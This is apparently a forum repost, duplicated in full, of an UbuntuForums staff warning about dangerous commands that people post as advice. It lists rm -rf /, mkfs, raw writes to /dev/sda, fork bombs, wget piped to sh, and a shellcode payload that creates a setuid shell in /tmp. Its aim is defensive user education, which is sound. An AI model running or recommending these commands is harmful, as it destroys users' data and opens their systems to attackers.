naveen_reloaded
!! RecuZant By Birth !!
ATTENTION ALL USERS:
Malicious Commands
I'd like to take a moment of
your time to discuss a recent
disturbing trend the staff has
been noticing on the forums,
and also take this as an
opportunity to raise awareness
of this situation through
education.
We've recently had an
increase in the number of
dangerous commands being
posted on the forums. Don't
pretend you don't know what I
mean -- commands that cause
massive damage or disruption
to the user's computer.
I'd just like to caution those
thinking of doing this that
UbuntuForums has a strict
zero-tolerance policy when it
comes to posting dangerous
commands . If you post one of
them, particularly in a support
thread disguised as advice,
expect to be instantly and
permanently BANNED , at the
account, e-mail, IP, or ISP
level. I do not care about
intent -- if you mean it as a
joke, it is not funny. If you
mean it as a lesson, go teach
it somewhere else. This
behavior is absolutely against
the Forum Guidelines and
Ubuntu Code of Conduct.
I'd also like to remind users to
be cautious when someone
tells you to run some
command or download some
script as a solution to your
problem. When in doubt as to
the safety of the procedure,
it's always a good idea to wait
for more opinions, and/or have
the command explained to you
and verify if the explanation
makes sense by consulting
readily available
documentation on Linux
commands (such as
manpages). No matter how
hard we try to stay on top of
all posts in realtime, we are
not perfect.
Regards,
The UbuntuForums Staff.
As requested by some, for the
education of our users, here
are some common examples
of dangerous commands that
should raise a bright red flag.
Again, these are extremely
dangerous and should not be
attempted on a computer that
has any physical connection to
valuable data -- many of them
will even cause damage from
a LiveCD environment.
Again, DANGEROUS
COMMANDS -- look but DO
NOT RUN .
Also, this is far from an
exhaustive list , but should give
you some clues as to what
kind of things people may try
to trick you into doing.
Remember this can always be
disguised in an obfuscated
command or as a part of a
long procedure, so the bottom
line is take caution for
yourself when something just
doesn't "feel right".
Delete all files, delete current
directory, and delete visible
files in current directory. It's
quite obvious why these
commands can be dangerous
to execute.
Code:
rm -rf / rm -rf. rm -rf *
Reformat: Data on device
mentioned after the mkfs
command will be destroyed
and replaced with a blank
filesystem.
Code:
mkfs mkfs.ext3 mkfs.anything
Block device manipulation:
Causes raw data to be written
to a block device. Often times
this will clobber the filesystem
and cause total loss of data:
Code:
any_command > /dev/sda dd
if=something of=/dev/sda
Forkbomb: Executes a huge
number of processes until
system freezes, forcing you to
do a hard reset which may
cause corruption, data
damage, or other awful fates.
In Bourne-ish shells, like Bash:
(This thing looks really
intriguing and curiousity
provokes)
Code:
){
:&};:
In Perl
Code:
fork while fork
Tarbomb: Someone asks you
to extract a tar archive into an
existing directory. This tar
archive can be crafted to
explode into a million files, or
inject files into the system by
guessing filenames. You
should make the habit of
decompressing tars inside a
cleanly made directory
Decompression bomb:
Someone asks you to extract
an archive which appears to
be a small download. In reality
it's highly compressed data
and will inflate to hundreds of
GB's, filling your hard drive.
You should not touch data
from an untrusted source
Shellscript: Someone gives you
the link to a shellscript to
execute. This can contain any
command he chooses -- benign
or malevolent. Do not execute
code from people you don't
trust
Code:
wget
*some_place/some_file
sh./some_file
Code:
wget
*some_place/some_file -
O- | sh
Compiling code: Someone
gives you source code then
tells you to compile it. It is
easy to hide malicious code as
a part of a large wad of
source code, and source code
gives the attacker a lot more
creativity for disguising
malicious payloads. Do not
compile OR execute the
compiled code unless the
source is of some well-known
application, obtained from a
reputable site (i.e.
SourceForge, the author's
homepage, an Ubuntu
address).
A famous example of this
surfaced on a mailing list
disguised as a proof of concept
sudo exploit claiming that if
you run it, sudo grants you
root without a shell. In it was
this payload:
Code:
char esp[] __attribute__
((section(".text"))) /* e.s.p
release */ = "\xeb\x3 e\x5
b\x31 \xc0 \x50 \x54 \x5 a\x83
\xec\x64 \x68 "
"\xff\xff\xff\xff\x68 \xdf\xd0
\xdf\xd9 \x68 \x8 d\x99 "
"\xdf\x81 \x68 \x8 d\x92 \xdf\xd2
\x54 \x5 e\xf7 \x16 \xf7" "\x56
\x04 \xf7 \x56 \x08 \xf7 \x56 \x0
c\x83 \xc4 \x74 \x56 " "\x8 d\x73
\x08 \x56 \x53 \x54 \x59 \xb0 \x0
b\xcd\x80 \x31 " "\xc0 \x40
\xeb\xf9 \xe8 \xbd\xff\xff\xff\x2
f\x62 \x69 " "\x6 e\x2 f\x73 \x68
\x00 \x2 d\x63 \x00 " "cp -p
/bin/sh /tmp/.beyond; chmod
4755 /tmp/.beyond;";
For more detail visit *www.ubuntuforums.org/announcement.php?a=54
Malicious Commands
I'd like to take a moment of
your time to discuss a recent
disturbing trend the staff has
been noticing on the forums,
and also take this as an
opportunity to raise awareness
of this situation through
education.
We've recently had an
increase in the number of
dangerous commands being
posted on the forums. Don't
pretend you don't know what I
mean -- commands that cause
massive damage or disruption
to the user's computer.
I'd just like to caution those
thinking of doing this that
UbuntuForums has a strict
zero-tolerance policy when it
comes to posting dangerous
commands . If you post one of
them, particularly in a support
thread disguised as advice,
expect to be instantly and
permanently BANNED , at the
account, e-mail, IP, or ISP
level. I do not care about
intent -- if you mean it as a
joke, it is not funny. If you
mean it as a lesson, go teach
it somewhere else. This
behavior is absolutely against
the Forum Guidelines and
Ubuntu Code of Conduct.
I'd also like to remind users to
be cautious when someone
tells you to run some
command or download some
script as a solution to your
problem. When in doubt as to
the safety of the procedure,
it's always a good idea to wait
for more opinions, and/or have
the command explained to you
and verify if the explanation
makes sense by consulting
readily available
documentation on Linux
commands (such as
manpages). No matter how
hard we try to stay on top of
all posts in realtime, we are
not perfect.
Regards,
The UbuntuForums Staff.
As requested by some, for the
education of our users, here
are some common examples
of dangerous commands that
should raise a bright red flag.
Again, these are extremely
dangerous and should not be
attempted on a computer that
has any physical connection to
valuable data -- many of them
will even cause damage from
a LiveCD environment.
Again, DANGEROUS
COMMANDS -- look but DO
NOT RUN .
Also, this is far from an
exhaustive list , but should give
you some clues as to what
kind of things people may try
to trick you into doing.
Remember this can always be
disguised in an obfuscated
command or as a part of a
long procedure, so the bottom
line is take caution for
yourself when something just
doesn't "feel right".
Delete all files, delete current
directory, and delete visible
files in current directory. It's
quite obvious why these
commands can be dangerous
to execute.
Code:
rm -rf / rm -rf. rm -rf *
Reformat: Data on device
mentioned after the mkfs
command will be destroyed
and replaced with a blank
filesystem.
Code:
mkfs mkfs.ext3 mkfs.anything
Block device manipulation:
Causes raw data to be written
to a block device. Often times
this will clobber the filesystem
and cause total loss of data:
Code:
any_command > /dev/sda dd
if=something of=/dev/sda
Forkbomb: Executes a huge
number of processes until
system freezes, forcing you to
do a hard reset which may
cause corruption, data
damage, or other awful fates.
In Bourne-ish shells, like Bash:
(This thing looks really
intriguing and curiousity
provokes)
Code:
){:&};: In Perl
Code:
fork while fork
Tarbomb: Someone asks you
to extract a tar archive into an
existing directory. This tar
archive can be crafted to
explode into a million files, or
inject files into the system by
guessing filenames. You
should make the habit of
decompressing tars inside a
cleanly made directory
Decompression bomb:
Someone asks you to extract
an archive which appears to
be a small download. In reality
it's highly compressed data
and will inflate to hundreds of
GB's, filling your hard drive.
You should not touch data
from an untrusted source
Shellscript: Someone gives you
the link to a shellscript to
execute. This can contain any
command he chooses -- benign
or malevolent. Do not execute
code from people you don't
trust
Code:
wget
*some_place/some_file
sh./some_file
Code:
wget
*some_place/some_file -
O- | sh
Compiling code: Someone
gives you source code then
tells you to compile it. It is
easy to hide malicious code as
a part of a large wad of
source code, and source code
gives the attacker a lot more
creativity for disguising
malicious payloads. Do not
compile OR execute the
compiled code unless the
source is of some well-known
application, obtained from a
reputable site (i.e.
SourceForge, the author's
homepage, an Ubuntu
address).
A famous example of this
surfaced on a mailing list
disguised as a proof of concept
sudo exploit claiming that if
you run it, sudo grants you
root without a shell. In it was
this payload:
Code:
char esp[] __attribute__
((section(".text"))) /* e.s.p
release */ = "\xeb\x3 e\x5
b\x31 \xc0 \x50 \x54 \x5 a\x83
\xec\x64 \x68 "
"\xff\xff\xff\xff\x68 \xdf\xd0
\xdf\xd9 \x68 \x8 d\x99 "
"\xdf\x81 \x68 \x8 d\x92 \xdf\xd2
\x54 \x5 e\xf7 \x16 \xf7" "\x56
\x04 \xf7 \x56 \x08 \xf7 \x56 \x0
c\x83 \xc4 \x74 \x56 " "\x8 d\x73
\x08 \x56 \x53 \x54 \x59 \xb0 \x0
b\xcd\x80 \x31 " "\xc0 \x40
\xeb\xf9 \xe8 \xbd\xff\xff\xff\x2
f\x62 \x69 " "\x6 e\x2 f\x73 \x68
\x00 \x2 d\x63 \x00 " "cp -p
/bin/sh /tmp/.beyond; chmod
4755 /tmp/.beyond;";
For more detail visit *www.ubuntuforums.org/announcement.php?a=54
.mind edit/remove those commands.post the basic things and ubuntuforums.org link.
pretty difficult to see it as a help for ubuntu users!rather the title suggests that Ubuntu is like Vista wtf 
